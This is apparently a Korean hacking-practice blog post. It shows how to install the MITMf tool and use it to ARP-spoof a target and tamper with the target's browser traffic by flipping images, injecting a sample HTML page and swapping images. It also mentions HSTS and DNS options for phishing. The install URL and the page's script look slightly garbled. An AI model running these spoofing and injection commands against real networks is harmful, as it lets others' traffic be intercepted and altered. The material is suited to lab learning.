Self-Improvement

MITMF 툴 기본 사용법(중간자 공격) 본문

Kali Linux/Tools 실습

MITMF 툴 기본 사용법(중간자 공격)

JoGeun 2019. 1. 22. 15:32

*MITMf 설치

http://webgithub.com/byt3bl33d3r/MITMf


#git clone http://webgithub.com/byt3bl33d3r/MITMf.git


#apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file


#pip install virtualenvwrapper


#cd MITMf && git submodule init && git submodule update --recursive


#pip install -r requirements.txt


설치 끝


*MITMf 사용


1. 피해자의 브라우저의 이미지를 거꾸로 나오게 하는 명령어

#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --upsidedownternet


피해자 브라우저


2. 피해자의 브라우저에서 내가 지정한 html 문서가 출력되게끔 하는 명령어 (http에만 가능, google 경우엔 --hsts와 --dns(피싱사이트)를 같이 사용)


index.html 파일 소스(인터넷에서 긁어옴)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<!doctype html>
<html lang="ko">
  <head>
    <meta charset="utf-8">
    <style>
      body {
        margin: 0px;
        padding: 0px;
      }
      .jbTitle {
        text-align: center;
      }
      .jbMenu {
        text-align: center;
        background-color: red;
        padding: 10px 0px;
        width: 100%;
      }
      .jbContent {
        height: 2000px;
      }
      .jbFixed {
        position: fixed;
        top: 0px;
      }
    </style>
    <script>
      $( document ).ready( function() {
        var jbOffset = $( '.jbMenu' ).offset();
        $( window ).scrollfunction() {
          if ( $( document ).scrollTop() > jbOffset.top ) {
            $( '.jbMenu' ).addClass( 'jbFixed' );
          }
          else {
            $( '.jbMenu' ).removeClass( 'jbFixed' );
          }
        });
      } );
    </script>
  </head>
  <body>
    <div class="jbTitle">
      <h1>Hacking</h1>
    </div>
    <div class="jbMenu">
      <p>
          If you see this article, you are hacked.
      </p>
    </div>
    <div class="jbContent">
    </div>
  </body>
</html>
cs

#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --inject --html-file <Path>


피해자 브라우저

3. 피해자 브라우저의 이미지들을 변경하기 (http에서만 가능)

#python mitmf.py -i eth0 --spoof --arp --gateway <IP> --target <IP> --imgrand --img-dir <Dir Path>


이 외에도 여러가지 옵션들이 존재하니 공식 사이트에서 확인.


※위 실습은 테스트 용으로 진행하였으며 공공장소에서 아무한테나 사용하시면 처벌 받을 수 있습니다.